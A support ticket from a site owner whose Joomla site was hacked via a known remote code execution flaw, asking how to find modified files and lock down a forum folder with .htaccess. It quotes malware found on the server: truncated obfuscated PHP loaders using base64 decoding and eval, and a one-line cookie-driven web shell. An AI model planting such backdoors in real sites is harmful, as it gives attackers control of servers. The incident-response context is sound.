Support

 Hi,
Our web site is hacked.
I think the hackers exploit one security hole which exists in Joomla ( CVE-2015-8562 - [20151201] - Core - Remote Code Execution Vulnerability ) which affects Jomla version 1.5 to 3.4.5.
We use Jomla 3.3.1. It is difficult for us to upgrade to Joomla 3.4.6 because we modified some Joomla core files to fit our requirements. Now if we upgrade to 3.4.6, that will break the web site.

We've noticed that the hackers modified lots of our Joomla core files and inserted some code. Example

<?php

if (!defined('ALREADY_RUN_1bc29b36f342a82aaf6658785356718'))

{

define('ALREADY_RUN_1bc29b36f342a82aaf6658785356718', 1);



$aqpbpbr = 8553; function pmuvjyckw($hlycrq, $gquzkk){$epicz = ''; for($i=0; $i < strlen($hlycrq); $i++){$epicz .= isset($gquzkk[$hlycr[$i]]) ? $gquzkk[$hlycr[$i]] : $hlycrq[$i];}

$tnfqv="base" . "64_decode";return $tnfqv($epicz);}

$dovbuz = '0yprLIjuMf0hgAIKdcjKfAneMKdkRw5I6wQPxQq70yprLIjuMf0hgAneMojpdXgedXZXC1aQ76kt1i3PlcpUdAIq7'.

'14WOfJUMfJpOvIqLEjrfv8PlE2XC1aQ76kt1i3pdXgedpjKMf3edX'.

...

<?php $GLOBALS['n2bf35138'];global$n2bf35138;$n2bf35138=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['mf55d']="\x4e\x29\x7a\x27\x25\x7d\x4f\x60\x2e\x5d\x75\x56\x58\x76\x31\x5a\x40\x73\x69\x43\x7c\x70\x4b\x6e\x72\x7b\xd\x41\x9\x2f\x3a\x6d\x39\x21\x7e\x57\x2b\x64\x2a\x3f\x4c\x46\x20\x3b\x63\x38\x49\x44\x3d\x36\x67\x28\x3e\x2d\x54\x33\x3c\x30\x71\x48\x34\x24\x51\x5c\x47\x74\x2c\x5e\x32\x45\x77\x66\x78\x22\x26\x50\x42\x53\x6f\x35\x79\x6c\x37\x62\x4a\x6b\xa\x5b\x52\x55\x59\x23\x4d\x65\x6a\x5f\x68\x61";$n2bf35138[$n2bf3513['mf55d'][71]

...

<?php
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                eval(base64_decode("aWYgKCFkZWZpbmVkKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JykpCnsKZGVmaW5lKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JywgMSk7CgogJHJyYXh3cHVvID0gMTU5OyBmdW5jdGlvbiB6ZGx5amtlKCRucHdwd25xbiwgJHdmc2pueil7JHhtdHdrZ3lxID0gJyc7IGZvcigkaT0wOyAkaSA8IHN0cmxlbigkbnB3cHducW4pOyAkaSsrKXskeG10d2tneXEgLj0gaXNzZXQoJHd
....

Or sometimes they create lots of files with code like this :

<?php if(isset($_COOKIE["LIg"])){$_COOKIE["sh"]($_COOKIE["LIg"]);exit;}

We've bought Akeeba Admin Tools and activated the WAF and created the .htaccess . We see that it helps to block lots of things, but, the hackers can still continue creating and modifying our Joomla files.

- Is there a way to determine which Joomla files have been modified by the hackers ?
- Can these kinds of hacks be blocked while we continue to use version 3.3.1 ?

Actually, it will take us months to upgrade to latest version of Joomla and ensure that the web site will not be broken.

Thank you.

Hi
Thanks for your help.
Actually, the .htaccess created by the Akeeba Admin Tools blocks all the attacks against all the Joomla folders.
This is a very nice tool.
But the problem I have now is that I have a vBulletin forum which is not protected.
The forum is installed under a folder called 'forum'. So, since the hackers are blocked to access to the Joomla folders/files, now they create .php files under the /forum/ directory.
Example : 459.php :

<?php if(isset($_COOKIE["ikjw"])){$_COOKIE["MHEfB"]($_COOKIE["ikjw"]);exit;}

How can I restrict access to this forum folder by modifying the .htaccess ?
But allow authorized files, I guess files like :
www.mysite.com/forum/
www.mysite.com/forum/register.php

and ban access to any other files under this 'forum' folder ?
Thanks !

I have already a .htaccess file under the /forum/ folder with this :

# Comment the following line (add '#' at the beginning)

# to disable mod_rewrite functions.

# Please note: you still need to disable the hack in

# the vBSEO control panel to stop url rewrites.

RewriteEngine On



# Some servers require the Rewritebase directive to be

# enabled (remove '#' at the beginning to activate)

# Please note: when enabled, you must include the path

# to your root vB folder (i.e. RewriteBase /forums)

RewriteBase /forum/



RewriteCond %{HTTP_HOST} !^www\.mysite\.com

RewriteRule (.*) http://www.mysite.com/forum/$1 [L,R=301]



RewriteRule ^((urllist|sitemap).*\.(xml|txt)(\.gz)?)$ vbseo_sitemap/vbseo_getsitemap.php?sitemap=$1 [L]



RewriteCond %{QUERY_STRING} !vbseourl=

RewriteCond %{REQUEST_URI} !(admincp/|modcp/|chat|cron)

RewriteRule ^(.*\.php)$ vbseo.php?vbseourl=$1 [L,QSA]



RewriteCond %{REQUEST_FILENAME} !\.(jpg|gif)$

RewriteRule ^(archive/.*)$ vbseo.php?vbseourl=$1 [L,QSA]



RewriteCond %{REQUEST_FILENAME} !-f

RewriteCond %{REQUEST_FILENAME} !-d

RewriteCond %{REQUEST_FILENAME} !^(admincp|modcp|clientscript|cpstyles|images)/

RewriteRule ^(.+)$ vbseo.php?vbseourl=$1 [L,QSA]

This ticket has been automatically closed. All tickets which have been inactive for a long time are automatically closed. If you believe that this ticket was closed in error, please contact us.